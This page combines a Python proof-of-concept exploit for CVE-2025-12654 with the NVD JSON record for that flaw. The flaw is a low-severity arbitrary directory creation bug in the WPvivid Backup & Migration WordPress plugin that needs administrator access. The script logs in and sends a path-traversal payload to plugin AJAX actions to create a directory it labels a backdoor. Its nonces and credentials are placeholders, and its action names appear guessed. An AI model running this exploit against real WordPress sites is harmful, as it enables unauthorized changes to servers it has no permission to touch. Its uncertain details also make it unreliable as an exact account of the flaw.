CVE-2025-12654

import requests import re # CVE-2025-12654 PoC - Arbitrary Directory Creation # Target: WPvivid Backup & Migration Plugin <= 0.9.120 # Authentication: WordPress Administrator required target_url = "http://target-wordpress-site.com" wp_admin_url = f"{target_url}/wp-admin/admin.php" # Step 1: Authenticate as WordPress Administrator session = requests.Session() login_data = { "log": "admin_username", "pwd": "admin_password", "wp-submit": "Log In", "redirect_to": "/wp-admin/admin.php?page=wpvivid-staging", "testcookie": "1" } session.post(f"{target_url}/wp-login.php", data=login_data) # Step 2: Exploit arbitrary directory creation via staging feature # The vulnerability is in check_filesystem_permissions() function # which doesn't validate the directory path properly exploit_data = { "action": "wpvivid_create_staging_directory", "dir_path": "../../../../var/www/html/backdoor_dir", # Path traversal "nonce": "your_staging_nonce_here" } response = session.post(wp_admin_url, data=exploit_data) # Alternative: Direct API call if nonce is obtained api_url = f"{target_url}/wp-admin/admin-ajax.php" api_data = { "action": "wpvivid_staging_create_dir", "path": "/tmp/arbitrary_directory", "_wpnonce": "obtain_valid_nonce" } response = session.post(api_url, data=api_data) print(f"Response Status: {response.status_code}") print(f"Response: {response.text}")

{"cve": {"id": "CVE-2025-12654", "sourceIdentifier": "[email protected]", "published": "2025-12-21T04:16:04.023", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary directory creation in all versions up to, and including, 0.9.120. This is due to the check_filesystem_permissions() function not properly restricting the directories that can be created, or in what location. This makes it possible for authenticated attackers, with Administrator-level access and above, to create arbitrary directories."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/tags/0.9.120/includes/staging/class-wpvivid-staging.php#L1535", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/tags/0.9.120/includes/staging/class-wpvivid-staging.php#L1568", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/tags/0.9.120/includes/staging/class-wpvivid-staging.php#L1571", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3397673%40wpvivid-backuprestore&new=3397673%40wpvivid-backuprestore&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/wpvivid-backuprestore/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/662aa8dd-69b7-49e3-811c-04329544e106?source=cve", "source": "[email protected]"}]}}